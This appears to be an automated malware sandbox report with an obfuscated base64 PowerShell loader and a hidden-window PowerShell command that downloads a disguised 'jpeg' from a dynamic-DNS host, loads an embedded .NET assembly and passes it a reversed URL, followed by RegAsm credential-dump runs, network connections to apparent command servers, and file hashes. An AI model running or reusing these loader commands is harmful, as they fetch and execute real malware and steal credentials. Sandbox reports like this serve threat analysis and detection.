⛲ ⫰ 〷N⤏ ꒼ ⛲ ⫰ 〷BT⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷cgBp⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Zw⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷CQ⤏ ꒼ ⛲ ⫰ 〷YgBh⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷ZQ⤏ ꒼ ⛲ ⫰ 〷2⤏ ꒼ ⛲ ⫰ 〷DQ⤏ ꒼ ⛲ ⫰ 〷QwBv⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷bQBh⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷bwBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBk⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷Bb⤏ ꒼ ⛲ ⫰ 〷FM⤏ ꒼ ⛲ ⫰ 〷eQBz⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷ZQBt⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷GY⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷GM⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bg⤏ ꒼ ⛲ ⫰ 〷u⤏ ꒼ ⛲ ⫰ 〷EE⤏ ꒼ ⛲ ⫰ 〷cwBz⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷bQBi⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷eQBd⤏ ꒼ ⛲ ⫰ 〷Do⤏ ꒼ ⛲ ⫰ 〷OgBM⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bj⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBt⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷bgBk⤏ ꒼ ⛲ ⫰ 〷EI⤏ ꒼ ⛲ ⫰ 〷eQB0⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷cw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷Ds⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷9⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bs⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷BB⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷cwBl⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷YgBs⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BU⤏ ꒼ ⛲ ⫰ 〷Hk⤏ ꒼ ⛲ ⫰ 〷c⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷Cg⤏ ꒼ ⛲ ⫰ 〷JwBk⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷b⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷GI⤏ ꒼ ⛲ ⫰ 〷LgBJ⤏ ꒼ ⛲ ⫰ 〷E8⤏ ꒼ ⛲ ⫰ 〷LgBI⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷bQBl⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷7⤏ ꒼ ⛲ ⫰ 〷C⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷J⤏ ꒼ ⛲ ⫰ 〷Bt⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷D0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷eQBw⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷LgBH⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷BN⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bo⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷VgBB⤏ ꒼ ⛲ ⫰ 〷Ek⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷p⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷SQBu⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷bwBr⤏ ꒼ ⛲ ⫰ 〷GU⤏ ꒼ ⛲ ⫰ 〷K⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷k⤏ ꒼ ⛲ ⫰ 〷G4⤏ ꒼ ⛲ ⫰ 〷dQBs⤏ ꒼ ⛲ ⫰ 〷Gw⤏ ꒼ ⛲ ⫰ 〷L⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Fs⤏ ꒼ ⛲ ⫰ 〷bwBi⤏ ꒼ ⛲ ⫰ 〷Go⤏ ꒼ ⛲ ⫰ 〷ZQBj⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷WwBd⤏ ꒼ ⛲ ⫰ 〷F0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷o⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B4⤏ ꒼ ⛲ ⫰ 〷HQ⤏ ꒼ ⛲ ⫰ 〷LgBO⤏ ꒼ ⛲ ⫰ 〷E4⤏ ꒼ ⛲ ⫰ 〷Sg⤏ ꒼ ⛲ ⫰ 〷v⤏ ꒼ ⛲ ⫰ 〷D⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷x⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷1⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷OQ⤏ ꒼ ⛲ ⫰ 〷4⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷M⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷5⤏ ꒼ ⛲ ⫰ 〷C4⤏ ꒼ ⛲ ⫰ 〷NQ⤏ ꒼ ⛲ ⫰ 〷0⤏ ꒼ ⛲ ⫰ 〷C8⤏ ꒼ ⛲ ⫰ 〷Lw⤏ ꒼ ⛲ ⫰ 〷6⤏ ꒼ ⛲ ⫰ 〷H⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷B0⤏ ꒼ ⛲ ⫰ 〷Gg⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷Cw⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷ZQBz⤏ ꒼ ⛲ ⫰ 〷GE⤏ ꒼ ⛲ ⫰ 〷d⤏ ꒼ ⛲ ⫰ 〷Bp⤏ ꒼ ⛲ ⫰ 〷HY⤏ ꒼ ⛲ ⫰ 〷YQBk⤏ ꒼ ⛲ ⫰ 〷G8⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷UgBl⤏ ꒼ ⛲ ⫰ 〷Gc⤏ ꒼ ⛲ ⫰ 〷QQBz⤏ ꒼ ⛲ ⫰ 〷G0⤏ ꒼ ⛲ ⫰ 〷Jw⤏ ꒼ ⛲ ⫰ 〷s⤏ ꒼ ⛲ ⫰ 〷Cc⤏ ꒼ ⛲ ⫰ 〷Z⤏ ꒼ ⛲ ⫰ 〷Bl⤏ ꒼ ⛲ ⫰ 〷HM⤏ ꒼ ⛲ ⫰ 〷YQB0⤏ ꒼ ⛲ ⫰ 〷Gk⤏ ꒼ ⛲ ⫰ 〷dgBh⤏ ꒼ ⛲ ⫰ 〷GQ⤏ ꒼ ⛲ ⫰ 〷bw⤏ ꒼ ⛲ ⫰ 〷n⤏ ꒼ ⛲ ⫰ 〷Ck⤏ ꒼ ⛲ ⫰ 〷KQ⤏ ꒼ ⛲ ⫰ 〷g⤏ ꒼ ⛲ ⫰ 〷H0⤏ ꒼ ⛲ ⫰ 〷I⤏ ꒼ ⛲ ⫰ 〷B9⤏ ꒼ ⛲ ⫰ 〷⤏ ꒼ ⛲ ⫰ 〷==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤏ ꒼ ⛲ ⫰ 〷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NNJ/001/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mnuxieeugdkwmqbwfmoqaxgsbqukagq"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xizqjwpwulcbowpawxbrlkbjkfmttrhehj"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkeiko"

Network

Country Destination Domain Proto
US 8.8.8.8:53 85.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
TR 45.90.89.50:80 45.90.89.50 tcp
US 8.8.8.8:53 50.89.90.45.in-addr.arpa udp
US 8.8.8.8:53 servidorwindows.ddns.com.br udp
BR 191.55.76.236:80 servidorwindows.ddns.com.br tcp
US 8.8.8.8:53 236.76.55.191.in-addr.arpa udp
TR 45.90.89.50:80 45.90.89.50 tcp
US 8.8.8.8:53 host.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro udp
US 192.3.176.174:26734 host.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro tcp
US 192.3.176.174:26734 host.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 174.176.3.192.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/5032-0-0x000000007147E000-0x000000007147F000-memory.dmp

memory/5032-1-0x0000000002A00000-0x0000000002A36000-memory.dmp

memory/5032-2-0x0000000005160000-0x0000000005788000-memory.dmp

memory/5032-3-0x0000000071470000-0x0000000071C20000-memory.dmp

memory/5032-4-0x0000000071470000-0x0000000071C20000-memory.dmp

memory/5032-5-0x0000000005010000-0x0000000005032000-memory.dmp

memory/5032-6-0x0000000005900000-0x0000000005966000-memory.dmp

memory/5032-7-0x0000000005970000-0x00000000059D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oh2g15sh.jxc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5032-17-0x0000000005C00000-0x0000000005F54000-memory.dmp

memory/5032-18-0x0000000005FE0000-0x0000000005FFE000-memory.dmp

memory/5032-19-0x0000000006030000-0x000000000607C000-memory.dmp

memory/5032-22-0x0000000071470000-0x0000000071C20000-memory.dmp

memory/5032-21-0x000000006DD30000-0x000000006DD7C000-memory.dmp

memory/5032-23-0x000000006DE90000-0x000000006E1E4000-memory.dmp

memory/5032-33-0x00000000071E0000-0x00000000071FE000-memory.dmp

memory/5032-20-0x00000000071A0000-0x00000000071D2000-memory.dmp

memory/5032-35-0x0000000071470000-0x0000000071C20000-memory.dmp

memory/5032-34-0x00000000072A0000-0x0000000007343000-memory.dmp

memory/5032-36-0x0000000071470000-0x0000000071C20000-memory.dmp

memory/5032-37-0x00000000079D0000-0x000000000804A000-memory.dmp

memory/5032-38-0x0000000007350000-0x000000000736A000-memory.dmp

memory/5032-39-0x00000000073D0000-0x00000000073DA000-memory.dmp

memory/5032-40-0x00000000075F0000-0x0000000007686000-memory.dmp

memory/5032-41-0x0000000007550000-0x0000000007561000-memory.dmp

memory/5032-42-0x0000000007580000-0x000000000758E000-memory.dmp

memory/5032-43-0x0000000007590000-0x00000000075A4000-memory.dmp

memory/5032-44-0x00000000075D0000-0x00000000075EA000-memory.dmp

memory/5032-45-0x00000000075C0000-0x00000000075C8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\nexa5qo0\nexa5qo0.cmdline

MD5 ff895dbcc3defafab18eaf3a42dff3a7
SHA1 bd2ea36c87e0ddb15990047ba7b68c53aecc5b93
SHA256 98082ad21f1b4440600f054839fef3464beb36cc4a0b0378fc7f007da4a8b858
SHA512 b36accb71fab15bb62c1adc05082220ebd505c2b3e38a21ff68e12f7e5978a7c3292ba10f61fd62350eed25ad3b7db79b6aa865eaa9bdd7ead8841fba4151ac3

\??\c:\Users\Admin\AppData\Local\Temp\nexa5qo0\nexa5qo0.0.cs

MD5 c8323e21fb3e0a43c3296686b3399df5
SHA1 6acf09f8b65000472a3011fa65600dbe223ce44e
SHA256 82cde5c0e8c3ebd12df77f91b0c4fb50c5b9448078a890907be15146d58a4922
SHA512 6c25e0c9ba56534963d10969fe65a7dd74c2e5f3f848c197e6b71699b71086f6920124e83a23e3f43894330c7a1feef2d7b39fe576eaf465e7ee78277083dd91

\??\c:\Users\Admin\AppData\Local\Temp\nexa5qo0\CSC132CAD0FEE943D6AA74BDCD267E512.TMP

MD5 dbf91bd70f6d753b6e7762c8cbe3fb42
SHA1 c09277da1e70cefea59ff3a7a3eaa4fa01d63f07
SHA256 a49111fe657c900864d751eafbc11c9ba5f3ee308ce8a8d01188f0a3089ca43c
SHA512 668b3ebee56bca044fd37720cdeea595749265a6d97a54fda95c14980a9e83325c0ba336ed15e9a49975becf6f935660ea61582a0d65790505255bb7a71037eb

C:\Users\Admin\AppData\Local\Temp\RESCCF5.tmp

MD5 52e4a9a553f59fbde4ec4376e15ac86a
SHA1 952f0febe5ae19b2e44b1653a404865d176236f4
SHA256 8e4fc15e2abd9b68d6ffd7e2f04bb16a27fbec0d540493d02712a8693bcaa839
SHA512 0caab9851e9d6db1c06672579c0adb2f732c711cfee87f22c4a3b918e2427f955cdbc1597e2bf44244f39c9070b22dda8ef8cd6d21b4160af7b5f239d925da5d

C:\Users\Admin\AppData\Local\Temp\nexa5qo0\nexa5qo0.dll

MD5 7c2e2a70c41193d60f8e47df8ba202b9
SHA1 28e7df9c6d10aa733ceec9dc53eba4e3fcac381e
SHA256 0fdc32082f20a896b1564c1ae0c058eda8c42c9718430d81802ef32ff3df8a1a
SHA512 a1545ad8ba38d128f511cd5b7d1b2ad41e7843bb483cde5e129f2888e5b3844c73cb59f7867ee057fc69a440134bd4ff6d237bdc05c1a37ca4b8de9df681c041

memory/5032-58-0x00000000075C0000-0x00000000075C8000-memory.dmp

memory/5032-64-0x0000000007860000-0x0000000007882000-memory.dmp

memory/5032-65-0x0000000008600000-0x0000000008BA4000-memory.dmp

C:\Users\Admin\AppData\Roaming\instantflowercaseneedbeautygirlsh.vBS

MD5 ccde7ef0e90a5a62394fafe77c7eff7e
SHA1 197cbc0c7ab873fd02bf2b8a3a17d7b0f44bb003
SHA256 cc67b8be8fc325cf915731f69dd2c36d77c12ea1819726e70ed57170fafd1722
SHA512 047baeb2e3d183605346025f86df3042f596bd2505adf7597ffb2fd972acf9db6bd62d03a3f9b52c9a9ffabca743d5e3c359a5a12fc79a3d6e93fdc8d7930dfe

memory/5032-71-0x0000000071470000-0x0000000071C20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 9faf6f9cd1992cdebfd8e34b48ea9330
SHA1 ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA256 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA512 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

memory/4512-82-0x0000000005530000-0x0000000005884000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 89dd2d15cac812c0872875ba99a96f39
SHA1 33161be4efc5d57b4a3c5f8c12200d5e0b11cd5d
SHA256 19e2e9dadc8a5008603fb742cb2bed026e55c9f384549fe51608ef85c85c1685
SHA512 4cc2a2d366017f62f555bf4e886d0a1be6f5efe7fe96dea111d7de4676140e747da1e85b0d54af20d0d92eb38b89bd0d3e1db4257fa9738d0b000aa71dfbec56

memory/4680-93-0x0000000007C40000-0x0000000007D62000-memory.dmp

memory/4680-94-0x0000000007E00000-0x0000000007E9C000-memory.dmp

memory/3940-95-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-99-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-100-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-103-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-97-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-104-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f76aa3d60df558ed2e87d0c1dcebf9c1
SHA1 f2164c5b21236a8607d5d63640ff78cddff5dc38
SHA256 fa67352ea39489880715896e5e69c07b88c0c07007f5445ed18cb1ba4392d700
SHA512 83a822dfe9f7040bbaeb5afb65e13d1994d5757c33956a587407483dee46b13ae13cf5959857016b9011373a402a7b947c57813225ddd93ba106373706c5e90c

memory/3940-107-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-108-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-109-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-110-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-112-0x0000000000400000-0x0000000000482000-memory.dmp

memory/5004-114-0x0000000000400000-0x0000000000462000-memory.dmp

memory/908-113-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5004-115-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2276-123-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2276-122-0x0000000000400000-0x0000000000424000-memory.dmp

memory/908-121-0x0000000000400000-0x0000000000478000-memory.dmp

memory/5004-119-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2276-120-0x0000000000400000-0x0000000000424000-memory.dmp

memory/908-116-0x0000000000400000-0x0000000000478000-memory.dmp

memory/908-118-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mnuxieeugdkwmqbwfmoqaxgsbqukagq

MD5 8b8277c8f03c24d1f290dbe476e961d2
SHA1 2e13baf3a4b708277d550dc3dd1e0f99b131f78e
SHA256 9af6881f6dbffba028a7a977f4c0a43c764f840332986993ad66de7b816c2f9e
SHA512 7367a0236cd0d6cd731caf1ba1f4ea8f851ea1018a9c6b49db6e9d13b2aaba92767774da9169481918e4287021ff5c3a58c3143eaa5e7fe9fa88383208615948

memory/3940-129-0x0000000010000000-0x0000000010019000-memory.dmp

memory/3940-133-0x0000000010000000-0x0000000010019000-memory.dmp

memory/3940-134-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-132-0x0000000010000000-0x0000000010019000-memory.dmp

memory/3940-137-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-136-0x0000000000400000-0x0000000000482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\word\logs.dat

MD5 3190bcf69e9683ba22151ac7119e6669
SHA1 c9a056113f410b64b9defdba53c61bb8fcd2a7d3
SHA256 e69333c6f35eef2da405a4f9e796a404b622ff39bb9ae9f70fcb83ca84f6831c
SHA512 3be76b31c53e1a547e5218916e26ecbd77e3c257d82f1ed37c4cf23a9a37c8e7626fb63381dbf785d718f9357aa7152d33ff3c1536d79dcce1100ab1109bbd04

memory/3940-144-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-145-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-152-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-153-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-160-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-161-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-169-0x0000000000400000-0x0000000000482000-memory.dmp

memory/3940-168-0x0000000000400000-0x0000000000482000-memory.dmp